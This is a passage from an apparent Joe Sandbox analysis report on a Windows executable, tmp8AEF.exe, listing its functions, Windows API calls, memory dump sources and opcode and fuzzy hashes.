                                                                                        • Associated: 00000009.00000002.2285089335.00007FF7CA7CE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2285089335.00007FF7CA7D3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2285165136.00007FF7CA7D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_9_2_7ff7ca790000_tmp8AEF.jbxd
                                                                                        Similarity
                                                                                        • API ID: ConsoleErrorLastMode
                                                                                        • String ID:
                                                                                        • API String ID: 953036326-0
                                                                                        • Opcode ID: 76adbd728b317254a89cb4c791728419eb9f151af89ead0c9a06842c56e3605f
                                                                                        • Instruction ID: b0a52941cb9615752afad55985b0c05099b2239c72e13ad98e9848fd6904ecc9
                                                                                        • Opcode Fuzzy Hash: 76adbd728b317254a89cb4c791728419eb9f151af89ead0c9a06842c56e3605f
                                                                                        • Instruction Fuzzy Hash: B391F872E08651B5F750AFA6B4602BDABA0BB48FAAF945175DE0E56684CF38D8418320
                                                                                        Function 00007FF7CA79C330 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000009.00000002.2284834998.00007FF7CA791000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CA790000, based on PE: true
                                                                                        • Associated: 00000009.00000002.2284804099.00007FF7CA790000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2284923903.00007FF7CA7BB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2285089335.00007FF7CA7CE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2285089335.00007FF7CA7D3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2285165136.00007FF7CA7D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_9_2_7ff7ca790000_tmp8AEF.jbxd
                                                                                        Similarity
                                                                                        • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                        • String ID:
                                                                                        • API String ID: 2933794660-0
                                                                                        • Opcode ID: 0f32e5fb6c1657f40c76225ea380b4ebd78bc5beffa0738dce661fe11625e8f4
                                                                                        • Instruction ID: ee83ad6b4579857d429fee5dd07026ccfa646570de9a954e2d3c1a2e719bafb2
                                                                                        • Opcode Fuzzy Hash: 0f32e5fb6c1657f40c76225ea380b4ebd78bc5beffa0738dce661fe11625e8f4
                                                                                        • Instruction Fuzzy Hash: 43114C22B14B058AFB009F61F8642A973A4FB5D769F840E31DE2D467A4DF78D1948350
                                                                                        Function 00007FF7CA7A832C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • _invalid_parameter_noinfo.LIBCMT ref: 00007FF7CA7A835E
                                                                                          • Part of subcall function 00007FF7CA7A9C58: HeapFree.KERNEL32(?,?,?,00007FF7CA7B2032,?,?,?,00007FF7CA7B206F,?,?,00000000,00007FF7CA7B2535,?,?,?,00007FF7CA7B2467), ref: 00007FF7CA7A9C6E
                                                                                          • Part of subcall function 00007FF7CA7A9C58: GetLastError.KERNEL32(?,?,?,00007FF7CA7B2032,?,?,?,00007FF7CA7B206F,?,?,00000000,00007FF7CA7B2535,?,?,?,00007FF7CA7B2467), ref: 00007FF7CA7A9C78
                                                                                        • GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF7CA79BEC5), ref: 00007FF7CA7A837C
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000009.00000002.2284834998.00007FF7CA791000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CA790000, based on PE: true
                                                                                        • Associated: 00000009.00000002.2284804099.00007FF7CA790000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2284923903.00007FF7CA7BB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2285089335.00007FF7CA7CE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2285089335.00007FF7CA7D3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2285165136.00007FF7CA7D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_9_2_7ff7ca790000_tmp8AEF.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\tmp8AEF.exe
                                                                                        • API String ID: 3580290477-4079050925
                                                                                        • Opcode ID: b12c586edd81a32e618353e8c6e47471c9321224668f8732ac6121a92b7f4d59
                                                                                        • Instruction ID: 8b9c2218cb89a7f3ae927790cc501ff7db176ff6db16334ef48eb104e5c9268c
                                                                                        • Opcode Fuzzy Hash: b12c586edd81a32e618353e8c6e47471c9321224668f8732ac6121a92b7f4d59
                                                                                        • Instruction Fuzzy Hash: BB41A232A08B52A5F714EF26F4640BCB794FB487A1F956075EA4D07785DE3CD8518320
                                                                                        Function 00007FF7CA7AFA4C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000009.00000002.2284834998.00007FF7CA791000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CA790000, based on PE: true
                                                                                        • Associated: 00000009.00000002.2284804099.00007FF7CA790000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2284923903.00007FF7CA7BB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2285089335.00007FF7CA7CE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2285089335.00007FF7CA7D3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2285165136.00007FF7CA7D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_9_2_7ff7ca790000_tmp8AEF.jbxd
                                                                                        Similarity
                                                                                        • API ID: DriveType_invalid_parameter_noinfo
                                                                                        • String ID: :
                                                                                        • API String ID: 2595371189-336475711
                                                                                        • Opcode ID: 229dc5225c97c31120184e1c5c073253f760aebc87e6502baf4f3d3b6f3e4c47
                                                                                        • Instruction ID: d0d91e3e2fe1d395c71b21dd748adfa5d8434768c1c9ec609554168318c0a5b1
                                                                                        • Opcode Fuzzy Hash: 229dc5225c97c31120184e1c5c073253f760aebc87e6502baf4f3d3b6f3e4c47
                                                                                        • Instruction Fuzzy Hash: F901D42291C20295FB20BF62B4712BEA3A0FF4D72AFC02075D54C42291DF3CD804CA30